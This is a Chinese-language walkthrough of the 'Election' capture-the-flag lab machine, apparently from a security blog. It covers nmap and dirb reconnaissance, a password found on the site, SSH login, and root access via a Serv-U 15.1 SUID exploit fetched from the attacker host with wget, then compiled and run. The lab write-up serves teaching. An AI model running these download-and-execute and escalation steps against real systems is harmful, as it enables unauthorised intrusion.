一、主机发现
arp-scan -l
靶机ip为192.168.55.147
二、端口扫描、目录枚举、漏洞扫描、指纹识别
2.1端口扫描
nmap --min-rate 10000 -p- 192.168.55.147
发现只开放了22和80端口
UDP端口扫描
nmap -sU --min-rate 10000 -p- 192.168.55.147
靶机没有开放UDP端口
2.2目录枚举
dirb http://192.168.55.147
扫出来了很多目录,等等尝试访问拿信息
2.3漏洞扫描
nmap --script=vuln -p22,80 192.168.55.147
无明显漏洞
2.4指纹识别
nmap 192.168.55.147 -sV -sC -O --version-all
三、进入靶机网站寻找信息,拿到低权限账号密码
发现网站只有默认页面
去刚刚目录枚举出来的页面进行信息收集
找到类似于目录的文件
找到登录框
尝试访问目录文件
成功找到新的信息
靶机开启后的用户名也是Love,说明此页面有更多的信息,继续枚举一下该网站的目录
dirb http://192.168.55.147/election
成功找到账号密码
love
P@$$w0rd@123
使用ssh直接连接
ssh [email protected]
四、SUID提权
4.1靶机内信息收集
该靶机没有定时任务
发现该用户也没有sudo权限
继续进行信息收集
4.2SUID提权
搜索suid文件
find / -perm -4000 -print 2>/dev/null
找到了一个特殊文件
注:
Serv-U 是一种被广泛运用的 FTP 服务器端软件,支持多种 Windows 系统,可将 PC 设置成 FTP 服务器,让用户通过 FTP 协议在同一网络的 PC 间进行文件或目录的复制、移动、创建、删除等作。
进入目录查看该文件
查看该日志文件
成功找到了版本号
去kali中搜索一下历史漏洞
searchsploit Serv-U 15.1
成功找到漏洞
然后直接使用该文件进行提权即可
以下内容为kali本机操作
python -m http.server 80
以下内容为靶机shell操作
wget http://192.168.55.132/47009.c
gcc -o 1 47009.c
chmod 777 47009.c
./1
提权成功!
原文始发于微信公众号(泷羽Sec-pp502的安全笔记):Election靶机详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论